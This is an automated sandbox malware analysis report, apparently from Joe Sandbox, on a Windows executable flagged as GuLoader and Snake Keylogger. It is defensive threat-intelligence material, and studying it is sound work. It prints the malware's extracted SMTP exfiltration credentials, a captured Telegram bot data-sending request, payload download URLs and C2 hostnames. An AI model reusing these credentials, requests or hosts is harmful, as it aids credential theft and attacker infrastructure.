Windows Analysis Report
SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Overview

General Information

Sample name: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Analysis ID: 1527845
MD5: e7ebd3de4bcba42feee0d2bd98521920
SHA1: 71608b8fd542467e554766de37cdc8244c84286f
SHA256: 383d758b111ebf7255078b12d04f9f0e39ea4f85733563344754cbaad4bf0581

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bagslog@cybertechllc.top", "Password": "7213575aceACE@@ ", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe ReversingLabs: Detection: 55%

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DC9A8 CryptUnprotectData, 11_2_385DC9A8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_385DD078 CryptUnprotectData, 11_2_385DD078
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00406001 FindFirstFileA,FindClose, 0_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040559F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00406001 FindFirstFileA,FindClose, 11_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_00402688 FindFirstFileA, 11_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 11_2_0040559F

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 172.67.177.134
Source: Joe Sandbox View IP Address: 132.226.247.73
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49710 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49712 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49708 -> 142.250.80.46:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49714 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49715 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49719 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49717 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49716 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49718 -> 172.67.177.134:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49713 -> 172.67.177.134:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx/1.18.0
  Date: Mon, 07 Oct 2024 08:56:21 GMT
  Content-Type: application/json
  Content-Length: 55
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000710C1000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000000.858359986.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20a
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBZr
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5958598913.0000000007750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/X
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=downloadtz
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eicar.org/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363A7000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
